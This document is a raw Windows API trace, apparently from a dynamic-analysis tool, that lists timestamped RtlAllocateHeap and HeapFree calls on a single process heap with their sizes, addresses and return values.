	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x2892d8
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x286ce8
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x2892d8
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x302188
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd28
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286ce8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x2892d8
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x78) returned 0x271d30
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd90
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fdf8
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd28 | out: hHeap=0x260000) returned 1
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302188 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd28
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x302a30
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x2892d8
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302ad8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302b40
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd90 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fdf8 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x271d30 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd28 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd28
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xf0) returned 0x302ba8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd90
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fdf8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302ca0
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302d08
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ad8 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302b40 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302a30 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd28 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd28
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x286ce8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x2892d8
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd28 | out: hHeap=0x260000) returned 1
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x302a30
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fd28
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286910
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a198
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc8) returned 0x302ab8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302d70
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302dd8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302e40
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302ea8
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302f10
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x286d18
	[0191.423] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302f78
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286ce8 | out: hHeap=0x260000) returned 1
	[0191.423] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd90 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fdf8 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ca0 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302d08 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ba8 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3024b8 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x29ec08
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x29ec08
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286870
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286870
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286960
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286988
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286960 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286988 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286988
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x2892d8
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286988 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x100) returned 0x3024b8
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286988
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286960
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286910 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd28 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.424] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302a30 | out: hHeap=0x260000) returned 1
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x302a30
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286910
	[0191.424] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a278
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x2892d8
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x2892d8
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a128
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a208
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a240
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a208 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a208
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a240 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x3025c0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a240
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a208 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a208
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x180) returned 0x302b88
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29ec08
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286870
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x29fd28
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2869b0
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286960 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286988 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286910 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302a30 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.425] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3024b8 | out: hHeap=0x260000) returned 1
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a160
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fcc0
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a358
	[0191.425] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x302ff8
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a208 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a240 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3025c0 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a128 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2859b8 | out: hHeap=0x260000) returned 1
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x180) returned 0x3037e0
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x2892d8
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286910
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc8) returned 0x3024b8
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302a30
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302588
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29fdb0
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x303968
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x3039e8
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x286ce8
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x303a50
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286988
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x3049d0
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286960
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a128
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x303ab8
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a240
	[0191.426] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a208
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302040 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302250 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302f78 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286d18 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302d70 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302dd8 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302e40 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ea8 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302f10 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ab8 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a198 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a278 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869b0 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fd28 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ff8 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a358 | out: hHeap=0x260000) returned 1
	[0191.426] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302b88 | out: hHeap=0x260000) returned 1
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x180) returned 0x302040
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302040 | out: hHeap=0x260000) returned 1
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x180) returned 0x302040
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x29ec08
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x29fcc0
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x29ec08
